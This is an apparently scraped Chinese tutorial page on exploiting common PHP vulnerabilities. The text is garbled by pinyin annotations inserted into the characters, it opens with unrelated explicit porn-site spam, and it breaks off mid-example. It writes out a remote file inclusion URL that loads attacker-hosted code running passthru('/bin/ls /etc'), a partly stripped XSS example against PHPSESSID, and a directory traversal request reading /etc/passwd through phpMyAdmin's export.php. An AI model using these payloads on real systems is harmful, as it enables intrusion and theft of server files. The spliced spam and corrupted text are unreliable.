日韩天天综合网_野战两个奶头被亲到高潮_亚洲日韩欧美精品综合_av女人天堂污污污_视频一区**字幕无弹窗_国产亚洲欧美小视频_国内性爱精品在线免费视频_国产一级电影在线播放_日韩欧美内地福利_亚洲一二三不卡片区

常見php頁(yè)面漏洞分析及相關(guān)問題解決_PHP教程

編輯Tag賺U幣
教程Tag:暫無(wú)Tag,歡迎添加,賺取U幣!

推薦:實(shí)用:動(dòng)態(tài)網(wǎng)頁(yè)制作技術(shù)PHP的十個(gè)應(yīng)用技巧
如何消滅或優(yōu)化那PHP開發(fā)網(wǎng)站程序的代碼呢? 這一點(diǎn)上我個(gè)人最主要的經(jīng)驗(yàn)只有兩點(diǎn),一是消除錯(cuò)誤的或低效的循環(huán);二是優(yōu)化數(shù)據(jù)庫(kù)查詢語(yǔ)句。其實(shí)還存在一些其它的優(yōu)化細(xì)節(jié),比如“str_rep

從現(xiàn)在的網(wǎng)絡(luò)安全來(lái)看,大家最關(guān)注和接觸最多的WEB頁(yè)面漏洞應(yīng)該是ASP了,在這方面,小竹是專家,我沒發(fā)言權(quán)。然而在PHP方面來(lái)看,也同樣存在很嚴(yán)重的安全問題,但是這方面的文章卻不多。在這里,就跟大家來(lái)稍微的討論一下PHP頁(yè)面的相關(guān)漏洞吧。
  
我對(duì)目前常見的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種。當(dāng)然,至于COOKIE欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多。那么,我們就一個(gè)一個(gè)來(lái)分析一下怎樣利用這些漏洞吧!
  
首先,我們來(lái)討論包含文件漏洞。這個(gè)漏洞應(yīng)該說(shuō)是PHP獨(dú)有的吧。這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠(yuǎn)程攻擊者可以利用這些漏洞以WEB進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意命令。我們來(lái)看一個(gè)例子:假設(shè)在a.php中有這樣一句代碼:

  

以下為引用的內(nèi)容:
include($include."/xxx.php");
  ?>

在這段代碼中,$include一般是一個(gè)已經(jīng)設(shè)置好的路徑,但是我們可以通過(guò)自己構(gòu)造一個(gè)路徑來(lái)達(dá)到攻擊的目的。比方說(shuō)我們提交:a.php?include=http://web/b.php,這個(gè)web是我們用做攻擊的空間,當(dāng)然,b.php也就是我們用來(lái)攻擊的代碼了。我們可以在b.php中寫入類似于:passthru("/bin/ls /etc");的代碼。這樣,就可以執(zhí)行一些有目的的攻擊了。(注:web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問題了。相關(guān)詳情可以去看<<如何對(duì)PHP程序中的常見漏洞進(jìn)行攻擊>>)。在這個(gè)漏洞方面,出狀況的很多,比方說(shuō):PayPal Store Front,HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些。
  
接著,我們?cè)賮?lái)看一下腳本命令執(zhí)行漏洞。這是由于對(duì)用戶提交的URI參數(shù)缺少充分過(guò)濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得目標(biāo)用戶的敏感信息。我們也舉個(gè)例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁(yè)面對(duì)PHPSESSID缺少充分的過(guò)濾,我們可以通過(guò)這樣的代碼來(lái)達(dá)到攻擊的目的:http://web/index.php?PHPSESSID=">在script里面我們可以構(gòu)造函數(shù)來(lái)獲得用戶的一些敏感信息。在這個(gè)漏洞方面相對(duì)要少一點(diǎn),除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等。
  
再然后,我們就來(lái)看看文件泄露漏洞了,這種漏洞是由于對(duì)用戶提交參數(shù)缺少充分過(guò)濾,遠(yuǎn)程攻擊者可以利用它進(jìn)行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來(lái)做例子。在phpMyAdmin中,export.php頁(yè)面沒有對(duì)用戶提交的'what'參數(shù)進(jìn)行充分過(guò)濾,遠(yuǎn)程攻擊者提交包含多個(gè)'../'字符的數(shù)據(jù),便可繞過(guò)WEB ROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說(shuō)打入這樣一個(gè)地址:export.php?what=../../../../../../etc/passwd